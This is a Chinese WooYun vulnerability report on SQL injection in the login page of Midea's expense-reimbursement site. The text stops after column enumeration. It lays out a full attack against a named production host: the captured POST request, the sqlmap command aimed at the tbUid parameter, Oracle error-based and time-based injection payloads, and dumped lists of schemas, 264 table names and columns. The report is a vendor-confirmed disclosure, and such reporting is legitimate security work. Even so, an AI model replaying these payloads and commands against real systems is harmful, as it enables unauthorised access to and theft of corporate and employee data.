当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160327

漏洞标题:美的多站漏洞SQL注入漏洞/弱口令(涉及大量敏感数据)

相关厂商:midea.com

漏洞作者: 心云

提交时间:2015-12-11 17:37

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

求上个首页,谢谢审核大大^_^

详细说明:

0X01 首先是sql注入漏洞
漏洞地址:

http://jders.midea.com.cn/Login.aspx


网上报账系统.png


经过简单测试发现并没有过滤

网上报账系统单引号报错.png


burp抓包
post.txt:

POST /Login.aspx?_dc=1449797912532 HTTP/1.1
Accept: */*
X-Ext.Net: delta=true
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://jders.midea.com.cn/Login.aspx
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: jders.midea.com.cn
Content-Length: 3065
Pragma: no-cache
__EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-%7Cpublic%7CbtLoginClick&__VIEWSTATE=%2FwEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDxYCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTUROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVGd5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFCsEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFgIfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=%2FwEWAgK0u6rDCwLk1b%2BVAi55K9r446%2BWQ%2F9WWUM6RazKyEiocm%2B1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng%3D%3D&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ%3D%3D&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU%3D&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY%3D&lb8=


sqlmap命令:

sqlmap.py -r post.txt --dbs -p tbUid --dbms oracle


结果:

injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
POST parameter 'tbUid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 170 HTTP(s) requests:
---
Parameter: tbUid (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDx
YCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAm
YPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTU
ROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVG
d5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFC
sEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFg
IfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFg
IfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2
xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEi
ocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'nhrH'='nhrH&tbPwd=d
d&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDx
YCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAm
YPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTU
ROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVG
d5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFC
sEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFg
IfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFg
IfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2
xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEi
ocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 9583=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'IqFl'='IqFl&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0
Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=
---
[09:47:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[09:47:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:47:40] [INFO] fetching database (schema) names
[09:47:49] [INFO] the SQL query used returns 8 entries
[09:47:53] [INFO] retrieved: CTXSYS
[09:47:56] [INFO] retrieved: EXFSYS
[09:48:00] [INFO] retrieved: JD_ERS
[09:48:03] [INFO] retrieved: MDSYS
[09:48:07] [INFO] retrieved: OLAPSYS
[09:48:10] [INFO] retrieved: SYS
[09:48:13] [INFO] retrieved: SYSTEM
[09:48:16] [INFO] retrieved: WLEAM
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] JD_ERS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WLEAM


涉及8个数据库:

8个数据库.png


当前库的所有表:

Database: JD_ERS
[264 tables]
+-------------------------------+
| A |
| A1 |
| A2 |
| ACCOUNT_TEST |
| AF_APPLY_DETAIL_BUSI |
| AF_APPLY_DETAIL_CULTIVATE |
| AF_APPLY_DETAIL_EVENCTION |
| AF_APPLY_DETAIL_TEAM |
| AF_APPLY_DETAIL_UNIVERSAL |
| AF_APPLY_MAIN |
| AM_MAIL_TEMPLATE |
| AM_MAIL_TEMPLATE_WF |
| AM_SEND_MAIL_LOG |
| AP_PAYMENT_BILL_BACK |
| AP_PAYMENT_BUDGET_ALL |
| AP_PAYMENT_HEADER |
| AP_PAYMENT_INTERFACE |
| AP_PAYMENT_LINE |
| AP_PAYMENT_SCHEDULE_DETAIL |
| AP_PAYMENT_SCHEDULE_HEADER |
| AP_PAYMENT_SCHEDULE_LINE |
| AP_PAYMENT_SCHEDULE_RELATION |
| AP_PAYMENT_ZK_ALL |
| AUTHORITY_ORG_BUDGET |
| AUTHORITY_ORG_BUDGET_DETAIL |
| AUTHORITY_USER_DETAIL |
| B |
| BAOSI_REQUIRE_LOG |
| BAOSI_REQUIRE_RIGHT |
| BAOSI_SYS_PROJECT |
| BAS_ACCOUNT_TITLE |
| BAS_ACCOUNT_TITLE_DEPT |
| BAS_ACCOUNT_TITLE_OUTLAY |
| BAS_AREA |
| BAS_AREA_CITY |
| BAS_ATTACHMENT |
| BAS_BILL_NUMBER_ITEM |
| BAS_BILL_NUMBER_MAIN |
| BAS_BILL_NUMBER_RIGHT |
| BAS_BUDGET_AUTHORITY_DETAIL |
| BAS_BUDGET_AUTHORITY_MAIN |
| BAS_BUDGET_AUTHORITY_USERS |
| BAS_COSTCENTER |
| BAS_COSTINFORMATION_DATA |
| BAS_COST_ITEM |
| BAS_CURRENCY |
| BAS_EMAIL |
| BAS_ENTERTAIN |
| BAS_ERP_SYNCHRONOUS |
| BAS_EXCHANGE |
| BAS_HOLIDAY |
| BAS_LEVEL_AREA |
| BAS_LEVEL_POST |
| BAS_MIP_NOTIFY_INTERFACE |
| BAS_MODULE_MANAGEMENT |
| BAS_MODULE_WORKFLOW |
| BAS_ORG |
| BAS_ORGANIZATION |
| BAS_ORG_RIGHT |
| BAS_OUTLAY_ITEM_DATA |
| BAS_PAYMENT |
| BAS_PERSONAL |
| BAS_POSTLEVEL_TEMP |
| BAS_POSTLEVLE |
| BAS_PRIVATETOPUBLICCAR_DATA |
| BAS_PUBLICCAR_DATA |
| BAS_SECRETLEVEL_DATA |
| BAS_SECTION_CUSTOMER |
| BAS_SECTION_OFFICE |
| BAS_SUBJECT |
| BAS_SUBJECT_DEPT |
| BAS_SYNC_ERRITEMS |
| BAS_SYNC_LOG |
| BAS_TELEPHONE_DATA |
| BAS_TEMPLATE |
| BAS_TRAVEL_EXPENSE |
| BAS_URGENCYLEVEL_DATA |
| BAS_VENDOR |
| BD_BUDGET |
| BD_BUDGET_0804 |
| BD_BUDGET_20150208 |
| BD_BUDGET_20150302 |
| BD_BUDGET_20150822 |
| BD_BUDGET_20150825 |
| BD_BUDGET_ADD_DETAIL |
| BD_BUDGET_ADD_MAIN |
| BD_BUDGET_ADJUST_DETAIL |
| BD_BUDGET_ADJUST_MAIN |
| BD_BUDGET_APPLY_DETAIL |
| BD_BUDGET_APPLY_ITEM |
| BD_BUDGET_APPLY_MAIN |
| BD_BUDGET_F064 |
| BD_BUDGET_F080 |
| BD_BUDGET_INPUT_DETAIL |
| BD_BUDGET_INPUT_MAIN |
| BD_BUDGET_LOCK_REC |
| BD_BUDGET_ORG |
| BD_BUDGET_ORG_0804 |
| BD_BUDGET_ORG_COL |
| BD_BUDGET_ORG_COL_0804 |
| BD_BUDGET_ORG_DEPART |
| BD_BUDGET_ORG_DEPART_0804 |
| BD_BUDGET_ORG_USER |
| BD_BUDGET_ORG_USER_0804 |
| BD_BUDGET_T |
| BD_BUDGET_TEMP1 |
| BD_BUDGET_TEMP2 |
| BD_BUDGET_TEMP3 |
| BD_BUDGET_TEMPLATE_DETAIL |
| BD_BUDGET_TEMPLATE_MAIN |
| BD_BUDGET_TEMP_ZF |
| BD_BUDGET_TEST |
| BD_ORG |
| BD_TEST |
| BD_ZF_DR |
| BD_ZF_DR_2015 |
| BEE_ELECTRONICINVOICE |
| BEE_ELECTRONICINVOICEREL |
| BEE_ELECTRONICINVOICEREL_TEMP |
| BEE_ELECTRONICINVOICE_TEMP |
| BEE_INTERFACE_LIST |
| BEE_SYNC_LOG |
| BEE_TICKETBILLRELATION |
| BEE_TICKETBILLRELATION_TEMP |
| BEE_TICKETORDER |
| BEE_TICKETORDER_TEMP |
| BEE_TICKETSETTLEMENT |
| BEE_TICKETSETTLEMENTREL |
| BEE_TICKETSETTLEMENTREL_TEMP |
| BEE_TICKETSETTLEMENT_TEMP |
| BILL_RIGHT_DEPT |
| BILL_RIGHT_EMP |
| BILL_RIGHT_MAIN |
| BILL_RIGHT_MENU |
| BILL_TYPECODE_DATA |
| BUDGET_TEST |
| C |
| CASH_RECEIPT_INPUT |
| CASH_RECEIPT_INTERFACE |
| CASH_RECEIPT_LINE |
| CASH_RECEIPT_MAIN |
| CASH_RECEIPT_MARK_DETAIL |
| CASH_RECEIPT_MARK_HEADER |
| CASH_RECEIPT_MARK_LINE |
| CASH_RECEIPT_MARK_RELATION |
| DEPARTMENTNUMBER_TMP |
| DETAIN_AGREEMENT_HEADER |
| ERS_LOGS |
| FD_ADVANCE |
| FD_INVOICE |
| FD_LOAN |
| FD_PAYABLE_DETAIL |
| FD_PAYABLE_MAIN |
| FD_PAYMENT_REC |
| FD_REFUND |
| FD_REFUND_DETAIL |
| FD_VERFICATION |
| FD_VERFICATION_DETAIL |
| IMG_BILLCODE_STATUS_INTERFACE |
| IMG_SYNC_SET |
| LSS_067 |
| MP_MERGE_PAYMENT_DETAIL |
| MP_MERGE_PAYMENT_MAIN |
| MV_ERP_BANK_ACCOUNTS |
| MV_ERP_BUDGET_DETAIL |
| MV_ERP_CURRENCY |
| MV_ERP_DETAIL_SUBJECT |
| MV_ERP_EXCHANGE |
| MV_ERP_GL_CODE_COMBINATIONS |
| MV_ERP_PAYMENT_DOCUMENTS |
| MV_ERP_PAY_REC |
| MV_ERP_PAY_REC_TEST |
| MV_ERP_SUPPLIER |
| MV_ERP_SUPPLIER_SITE |
| MV_ERP_TERMS |
| PARTS |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| RP_DEIFINED_ORG_BUDGET |
| RS_BUSI_DETAIL |
| RS_COST_BEE_DETAIL |
| RS_COST_DETAIL |
| RS_COST_MAIN |
| RS_TRAVELLING_BEE_DETAIL |
| RS_TRAVELLING_DETAIL |
| RS_TRAVELLING_MAIN |
| S010 |
| S011 |
| S011_TEMP |
| S012 |
| S012_TEMP |
| S012_TEMP_ZF |
| S020 |
| S021 |
| S022 |
| S023 |
| S024 |
| S027 |
| S033 |
| S034 |
| S035 |
| S036 |
| S037 |
| S040 |
| S041 |
| S050 |
| S080 |
| S081 |
| S201 |
| S202 |
| S203 |
| S204 |
| S205 |
| S206 |
| S207 |
| S208 |
| S209 |
| S210 |
| S211 |
| S212 |
| S213 |
| S214 |
| S215 |
| S220 |
| S231 |
| S232 |
| S240 |
| S241 |
| S242 |
| S243 |
| S250 |
| S251 |
| S252 |
| S261 |
| S263 |
| S264 |
| S265 |
| S266 |
| S267 |
| S268 |
| SHARE_ACCOUNTS |
| SHARE_DETAIL |
| SHARE_MAIN |
| SMS_SEND |
| SMS_SEND_HISTORY |
| SMS_SYS_CONFIG |
| SUBJECT_TEST |
| SUPPLIER_BANK_ACCOUNTS |
| TEMP_ORACLEPANEL |
| TEMP_SVXBAR |
| TEMP_TABLESPACE |
| TEST1 |
| USER_TEMP |
| ZF_ACCOUNT |
| ZF_COSTCENTER |
| ZF_DEPT |
| ZF_DR_BUDGET |
| ZF_S011 |
| ZF_S207 |
| ZF_S267 |
| ZF_SUBJECT |
+-------------------------------+


涉及大量敏感数据:

user-temp.png


178W.png


详细字段:

[11:16:34] [INFO] fetching columns for table 'BAS_EMAIL' in database 'JD_ERS'
[11:16:34] [INFO] the SQL query used returns 18 entries
[11:16:34] [INFO] resumed: CREATENAME
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: CREATETIME
[11:16:34] [INFO] resumed: DATE
[11:16:34] [INFO] resumed: UPDATEID
[11:16:34] [INFO] resumed: VARCHAR2
